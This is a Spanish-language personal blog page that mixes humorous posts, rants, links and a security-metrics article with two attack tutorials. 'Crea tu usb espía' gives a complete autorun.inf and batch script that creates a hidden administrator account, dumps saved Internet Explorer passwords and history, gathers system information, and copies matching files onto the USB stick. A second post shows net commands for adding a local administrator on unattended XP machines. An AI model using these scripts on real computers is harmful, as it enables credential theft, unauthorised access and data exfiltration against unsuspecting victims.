Religión Informática

No les sugiero leer este post.

Es resultado del desvelo de hoy y una estúpida idea

encontrar las similitudes entre la religión y las tecnologías de información

Para los valientes: aquí va

La historia de windows. Un código cerrado, dogmático. Que era sostenido por Bill Gates como una eminencia que buscaba iluminar al mundo con una solución a sus problemas. Aquel que no quisiera usar windows estaba en problemas porque se les cerraban muchas puertas. Windows cuesta y Tarde o temprano debido a la rebeldía de la gente fue necesario implementar mecanismos de castigo para la piratería. Hoy día aquellos que usan windows pirata pueden ser legalmente atacados. Muchos han optado por estar en contrar de windows debido a su histórico monopolismo y ahora muchos optan por sistemas operativos alternos

De igual manera la religión católica es dogmática y cerrada. El papa es el estandarte de la misma y busca mediante la palabra divina ofrecer redención y solución a los problemas mundanos. Aquellos que se han interpuesto a la religión católica han sido quemados, asesinados, callados... Ir a la iglesia cuesta. Muchos ahora están en contra de sus creencias dada su baja congruencia con sus propios principios

Del otro lado está Linux. Una corriente filosófica que comparte un mismo kernel y donde pueden existir diferentes distribuciones (fedora, ubuntu,...). La gente que cree en linux comparte con los suyos esto sin esperar nada a cambio y se empeña en mejorar las aplicaciones.

Los cristianos por su parte comparten la creencia en la biblia pero son libres de interpretarla en algunos aspectos y tienen sus modos de vida. Algunos no toman nada, otros si pueden tomar, algunos creen en la existencia de dinosaurios otros no (esto lo digo basado en una encuesta que hice a cristianos). Y la mayoría de ellos se empeña en reproducir su palabra.

Aquí otras comparaciones

BIblia de bolsillo: usb
Cruz: Tux
Meditación: hibernación
Mandamientos: Licencia open source
Reencarnación: full restore
Exodo: DRP
Moisés separando el mar: virtualización
Perdon de los pecados: última configuración aceptada
Confirmación: "Está seguro de que quiere borrar los archivos"
Unción: Format -f
Demonios: malware
confesionario: vpn
Vaticano: sillicon valley
Bautizo: USERID
Cuaresma: maintenance window
tentación: phising
misa: cualquier reunión masiva de microsoft o apple
confesión: yahoo answers
cirio: batería

lo se, fue un post lamentable, pero ya me siento mejor

Read More

Creo que se les perdió su perro

En mi vida he tenido la oportunidad de ver muchas cosas

El boom del internet
Eclipses
Lluvias de estrellas
Caída del muro


Pero difícilmente algo tan impactante como un perro que se mata solo

Read More

Esas Cosas que encabronan - La banca

De por sí creo que los bancos (aunque son un mal necesario en nuestro sistema económico) son odiosos por naturaleza, hace algunas semanas me nació del diafragma postear sobre algo que realmente me encabrona.


En esta ocasión me remitiré a 2 tópicos

Los cajeros
La banca por internet

Puede ser que no todos los bancos caigan en esto pero al menos 2 o 3 seguro sí

Primer asunto, necesitas efectivo, vas al cajero, todo chido y de repente empieza la oleada de preguntas:
desea usted donar
esta seguro que no quiere donar
es usted tan ojete que no quiere donar y pagar nuestros impuestos?
Felicidades acaba de ganarse un seguro mensual por solo $$$
Seguro qu eno lo quiere
y aparte te imprimen un ticket para que a huevo lo leas, no vaya a ser que el ticket tenga tu saldo o algo así
Y el colmo es que en muchos cajeros no puedes cancelar y saltarte los mensajes, tienes que chutartelos a wiwi porque tiene tu tarjeta y tu sesión abierta

La otra, muchos bancos cobran la banca por internet aunque en realidad les hace el paro con costos de personal y que no hay colas interminables en sus sucursales
Que sus clientes hacen autoservicio, etc etc. Es un robo, deberían al contrario cobrar menos comisiones.

En sí los bancos me causan agruras, es muy triste ver como gente se vuelve millonaria usando el dinero de los demás y aparte les pagamos por hacerlo... SAD SAD SAD

Creo que mi alma descansó, se vale comentar

Happy flaming

Read More

Crea tu usb espía

Concepto:

Crear una usb con motivos demostrativos sobre lo fácil que es usar este medio con fines peligrosos

Crearemos una usb que al momento de conectarse al USB realiza las siguientes acciones:

1 - Crea un usuario administrador
2 - Escribe archivos en la máquina destino
3 - Copia información del sistema para ataques posteriores
4 - Copia archivos al USB
5 - Roba contraseñas guardadas de IEXPLORER e historial




Que necesitamos:

Memoria USB
Descargar el sw iepv y el iehv y descomprimir el contenido en la raiz de la USB

El método que usaremos no usa sw especializado, ya que casi siempre estas herramientas son detectadas por los antivirus actualizados. Lo que haremos es "a patín", es decir crearemos archivos bat que llamarán diferentes rutinas que harán las fechorías

Manos a la obra

Lo primero es crear un archivo autorun.inf en la raiz de la usb, mismo que será quien inicie automáticamente el archivo bat que crearemos al conectar la memoria
* NOTA: el windows puede estar configurado para no correr autorun cuando algo se conecta, pero casis siempre es lo contrario

Para crear el autorun abrimos un notepad y escribimos:
[autorun]
open=usbproject.bat

Ahora guardamos el archivo como autorun.inf
*recuerden que al darle save as hay que seleccionar donde dice "all files", de lo contrario lo guarda como autorun.inf.txt

Creamos una carpeta llamada archivosrobados

Ahora abrimos notepad y ponemos el siguiente código (los campos en mayúscula pueden ser cambiados)


@echo off

net user USERNAME PASSWORD /add

net localgroup administrators USERNAME /ADD

mkdir c:\DIRECTORIO

echo "TEXTO QUE QUEREMOS ESCRIBIR EN EL WARNING" > c:\DIRECTORIO\NOMBREARCHIVO.txt

start iepv.exe /sverhtml NOMBREOUTPUT.html

start iehv.exe /sverhtml NOMBREOUTPUT2.html

systeminfo > NOMBREOUTPUT3.txt

dir d:\ /s /b | find "STRINGDEBUSQUEDA" >NOMBREOUTPUT4.txt

setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (NOMBREOUTPUT4.txt) do (
set /a n+=1
set v!n!=%%a

copy "%%a" "%CD%\archivosrobados"

)
set v

dir c:\ /s /b | find "STRINGDEBUSQUEDA" >NOMBREOUTPUT4.txt

setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (zoutput.txt) do (
set /a n+=1
set v!n!=%%a

copy "%%a" "%CD%\archivosrobados"

)
set v

exit

ahora guardamos el archivo como usbproject.bat

Y listo, hemos terminado.

No olviden después de correr la herramienta eliminar al usuario creado, etc etc

Happy usbing

Material extra
Explicación para configurar el código

USERNAME: nombre del usuario que crearán
PASSWORD: Password que asignarán a dicho usuario
DIRECTORIO: ruta donde depositarán un archivo falso para demostrar que es posible hacerlo
NOMBREOUTPUT: nombre del archivo que contendrá contraseñas de IEXPLORER
NOMBREOUTPUT2: nombre del archivo que contendrá el historial
NOMBREOUTPUT3: nombre del archivo que contendrá información del sistema
NOMBREOUTPUT4: nombre del archivo temporal donde se guardan los archivos a copiar

Read More

create permisos de administrador en XP

Mucho se ha dicho sobre la seguridad perimetral, antivirus, bla bla

Lo cierto es que si la gente deja sus equipos desatendidos se pueden hacer maravillas

Hoy posteo uno de los trucos más baratos que existen en windows

Cómo crear un usuario local con permisos de administrador en 2 patadas sin tener permisos antes


Para este ejercicio haremos uso de la herramienta básica Command Prompt
Así es: viles líneas de código

Lo primero que debes hacer es abrir el cmd (command prompt)

Una vez hecho lo anterior haremos uso del comando net

Basta con escribir:

net user NOMBREDEUSUARIO PASSWORD /add

Este comando creará el usuario

Posteriormente le daremos permisos de administrador a ese usuario creado:

net localgroup Administrators NOMBREUSUARIO /add

Ahora que si lo que queremos es cambiar el password de un usuario basta con teclear:

net user NOMBREDELUSUARIO * /NOMBREDELDOMINIO

Es molesto ver que es tan sencillo no?

Pues así es mis amigos, así que vayan pensando en regular sus comandos net

Happy netting

Read More

Seguridad en redes wireless

Mucho se ha dicho ya del tema de seguridad en redes inalámbricas

Me imagino que más de uno de ustedes se ha puesto a auditar la seguridad de algunas redes propias o vecinales, jejeje

Precisamente para quienes quieren aprender más sobre este tema y sobre las vulnerabilidades más comunes existe el sitio http://wirelessdefence.org/

En este lugar encontrarán información que va desde como crear una laptop para auditorías hasta ver las herramientas una por una con objetivos educacionales

de manera adicional, les recuerdo que existe wifislax. Distribución customizada basada en slackware (distro linux) que corre desde live cd o desde USB

Read More

Si no lo mides.... no lo mejoras - to protect and serve

Una de las cosas más difíciles en seguridad de información es mostrar que tan seguro estás, que tan bien haces tu chamba como administración de la seguridad.

Precisamente por eso es importante siempre tener un esquema de medición basado en indicadores de performance e indicadores meta



No seré demasiado teórico y procuraré entrar a la práctica. Sólo antes quisiera aclarar conceptos básicos:
- KPI: key performance indicator (que tan bien vas)
- KGI: key goal indicator (que lograste)

Existe mucha confusión en como usar esta nomenclatura en los indicadores así que nos limitaremos a llamarlos como tal y los usaremos como KPIs o KGIs dependiendo de la situación. Lo importante es medirlos y que sean útiles, no tanto como los denominemos

El proceso básico de gestión de indicadores en lenguaje coloquial es el que todos conocemos:

Gestión estratégica
- Qué quiero lograr
- A donde quiero llegar
- Cómo puedo medir eso

Comunicación, ejecución y mejora
- Cómo voy hacia dicho logro
- Lo logre?
- Que, cuando y cómo tengo que mejorar
- Ahora sí ya lo logré

Redefinición de estrategia
- Ok, ahora que sigue?

Algo básico para definir indicadores útiles es usar el ya conocido esquema SMART
S: Specific (libres de ambigüedad, que no te confundas al interpretarlos, que midan algo específico, no subjetividades de subjetividades)
M:Mesurable (que se puedan medir)
A:Achievable (que se puedan alcanzar, indicadores soñadores sólo sirven para eso, par asoñar)
R:Relevant (que realmente sean importantes y por si mismos te expliquen lo que quieres medir)
T: Time Framed (que se puedan medir y comparar en el tiempo)

Una sugerencia más antes de ver ejempos
Traten de jerarquizar lo que quieren medir
Vayan de lo que el negocio quiere ver, luego lo que los clientes quieren ver, luego lo que el CIO y depto de sistemas quiere ver, y luego lo que los responsables de seguridad quieren ver
Debe existir relación y "cascadeo" para asegurar alineación de necesidades y requerimientos.
Nunca está de más tener un tablero de control para hacerle la vida más facil a quienes reciban l ainformación

Una vez dicho lo anterior, aquí algunos ejemplos:

% De covertura de seguridad



Un indicador que te permite saber que tan controlado y cubierto estás contra las principales amenazas a través de los controles básicos o baseline

Se calcula haciendo escaneos de los dispositvos en la empresa y se comparan contra los logs de los antivirus, antispam, firewalls, etc. Y así se aclara que porcentaje de ellos están protegidos

La desventaja: no te dice que tan bien protegido estás

Compliance de Parches

El tradicional indicador que mediante un escaneo te permite saber cuales equipos no tienen la última versión de parches actualizada y también cuanto tiempo tardan los parches en ser implementados (distribuido en su criticidad)

Aquí es importante hacer variaciones de manera que se adapten a sus necesidades. Por ejemplo, se puede sólo reportar: equipos que les faltan más de 2 parches críticos (no instalados en más de 2 semanas) o parches que tienen más de 2 veces el tiempo máximo permitido para instalarse

Compliance de plataforma instalada

A través de herramientas verificas periódicamente la configuración de tus items de seguridad. Puede extenrese a switches, firewalls e incluso equipos de cómputo
Similar a un scanning de langard pero hecho para configuraciones estándar (hardening style)

De esta manera puedes saber por ejemplo cuantos servidores no cumplen lo establecido en la imagen estándar.

Información detallada te permitiría saber que switches no tienen password, o que puertos no están cerrados, que servicios de sistema operativo innecesarios están arriba, etc etc

Podrías incluso tener calificaciones para poder tener un número(KPI) o podrías obtener %s

Desviaciones a políicas de seguridad

Documentar y medir las ocasiones en que se han violado las políticas de seguridad (al menos las que conoces).
Estas desviaciones pueden ser obtenidas en auditorías o en reportes/incidentes

Reportes de desviaciones de seguridad de usuario

Este indicador consiste en medir que tanto los empleados te notifican sobre temas de seguridad.

Este indicador a veces es mejor mientras más alto es porque quiere decir que la gente está consciente de su responsabilidad con respecto a la seguridad de información

Si después de varios años sigues teniendo niveles altos, perocúpate entonces...

Ataque que atentan a la seguridad de la empresa

Aquí dependiendo de lo que necesites medir pueden haber variables.

Por ejemplo: para los clientes o stakeholders quizá es más importante tener la cuenta de los ataques que afectaron el valor de la empresa (defacements, virus, robo de información, etc que fueron existosos desde el punto del atacante)

Para los responsables de seguridad talvez sería también importante medir el número de ataques en total e incluso a nivel análisis, el tipo de los mismos, su resultado, vulnerabiliad asociada, etc

Usuarios Peligrosos

Esta medición puede más bien ser como un reporte donde vez el top 50 de usuarios que generan más alertas o logs de seguridad (del antivirus, del antispam, de ids, de Active Directory, correo electrónico, etc)con la finalidad de investigar con más detalle.

recordemos que normalmente hay personas que pueden ser focos de seguridad y que mitigando sus vulnerabiliades o conociendo que es lo que realmente pasa podemos reducir considerablemente nuestros riesgos

ALE

Annual Loss Expentancy
Este indicador me parece un poco complejo e incierto. Sin embargo muchas empresas lo utilizan para mostrar cuanto se podría perder durante el año por temas de seguridad de información


Costo de riesgos materializados

El problema de este indicador es que es post-mortem
Una vez efectivo un ataque es importante cuantificar los daños y reportarlo para que en próximos años se tomen en consideración para inversión

de manera similar este indicador puede ayudar a los especialistas a saber que tanto valor no pudieron proteger correctamente para la empresa

Madurez

Para medir procesos de gestión de seguridad se puede medir la madurez del mismo usando frameworks como COBIT o ISO 27001. Con esto puedes tener puntos de referencia para saber como estás con respecto a normas
De manera adicional también se puede crear un modelo de madurez interno aunque esto no es recomendable para poder realizar benchmark

Último comment
No hay una fórmula secreta. Pero seguro hay indicadores que todos podríamos usar para mejorar la transparencia y control. Lo primero siempre será saber que es lo que más queremos medir, una vez controlado esto prosigan con otros tópicos
No traten de comerse al mundo, porque seguro se los va a comer primero a ustedes

Happy measuring

Read More

Quiero ir al antro!

Voy a contar los días antes de que Gerza se aprenda esta rola...

Read More

Para el frío!

Cada quien tiene su remedio para el frío, algunos aplican el tequila, algunos la cobija de tripas, algunos el mezcal, etc. El año pasado en navidad hice una receta Alemana de Glüh Wein que es vino caliente con especias y naranja, muuuy bueno que quita el frío rapidísimo. Por ahí me encontré esta receta de Sbiten, un té (que también se puede hacer con vino) del norte de Rusia que suena muuuy bien para esas noches de frío.

http://www.wikihow.com/Make-Sbiten

Happy warming up!

Read More

No te metas a mi Facebook

Read More

El club con el mejor Dress Code

Mi proxima fiesta de cumpleaños será así... ya lo veo venir...

http://thechive.com/2009/12/01/london-club-with-the-best-dress-code-ever-30-photos/

Read More

Hack your brain to sleep less (and better)

Navegando por ahí me encontré este artículo sobre una interesante teoría. Nuestro cuerpo se regenera y descansa mientras dormimos, pero no todas las fases del sueño tienen este poder regenerador. La fase de REM (Rapid Eye Movement) es la que tiene mayores efectos regenerativos. Uno de estos ciclos dura alrededor de 20 minutos y para llegar al siguiente necesitas al rededor de 2 horas de tiempo de sueño "desperdiciado". Si puedes hacer que tu cerebro llegue a estas etapas de REM sin todo ese tiempo de relleno entre ellas, entonces puedes dormir poco y estár totalmente lúcido. El artículo que les pongo a continuación muestra algunos metodos para lograrlo. Algunos son bastante irreales (sobre todo los últimos en los que duermes solo 2 horas en total) porque los horarios de siestas deberán ser muy rígidos. Sin embargo dependiendo de su estilo de vida, podrían ser posibles.

http://dustincurtis.com/sleep.html

Creo que voy a intentar alguno en el que tenga que dormir solo 4.5 horas...

Happy "no sleeping"

Read More